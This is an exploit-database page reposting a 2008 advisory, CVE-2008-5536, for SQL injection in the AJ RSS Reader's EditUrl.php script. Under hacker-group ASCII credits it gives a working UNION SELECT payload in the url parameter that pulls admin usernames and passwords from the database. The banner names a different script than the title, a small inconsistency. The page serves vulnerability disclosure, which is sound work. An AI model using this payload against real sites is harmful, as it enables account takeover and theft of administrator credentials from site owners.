Advertisement






Aj RSS Reader (EditUrl.php url) SQL Injection Vulnerability

CVE Category Price Severity
CVE-2008-5536 CWE-89 $1500 High
Author Risk Exploitation Type Date
AJ High Remote 2008-10-31
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N 0.8393 0.99019

CVSS vector description

Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2008100253

Below is a copy:

==================================================================================================================
          SSSSS  NN    N      AA      K   K  EEEEE  SSSSS        TTTTTTTTT EEEEE     AA     MM     MM
          S      N N   N     A  A     K  K   E      S                T     E        A  A    M M   M M
          SSSSS  N  N  N    AAAAAA    KKK    EEEEE  SSSSS            T     EEEEE   AAAAAA   M  M M  M
              S  N   N N   A      A   K  K   E          S            T     E      A      A  M   M   M
          SSSSS  N    NN  A        A  K   K  EEEEE  SSSSS            T     EEEEE A        A M       M
===================================================SNAKES TEAM====================================================
+                                                                                                                =
=              AJ Forced Matrix Script   Remote SQL Injection Vulnerability                                        +
+                                                                                                                =
==============================================:::ALGERIAN HaCkEr:::===============================================
                =        =                                                                =          =
                =      =           Discovered By: yassine_enp  :::ALGERIAN HaCkEr:::         =     =   
                =                                                                                    =
                =    =    ************ ::::::home : www.snakespc.com/sc::::::***************     =   =
                =                                                                                    =
                =      =               :::::Mail: [email protected]:::::::             =     =
                =                                                                                    =
                =        = ::::script Demo: http://www.ajsquare.com/resources/rss_reader/::::=         =
                =               nome de script :rss_reader
                                                                     =
                ======================================yassine_enp===================================


Exploit(1):
********

www.sit.com/[script_path]/EditUrl.php?url=-7+union+select+1,password,3,username+from+admin--


                                
===================================================================================================================

Mr.HCOCA_MAN:::DrEaDFuL:::super cristal:::His0k4:::sunhouse2:::aSSaSSin_HaCkErS:::THE INJECTOR:::ALL www.Snakespc.com/SC >>>> Members 

===================================================================================================================
                                  
                                                          ::::[email protected]::::

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum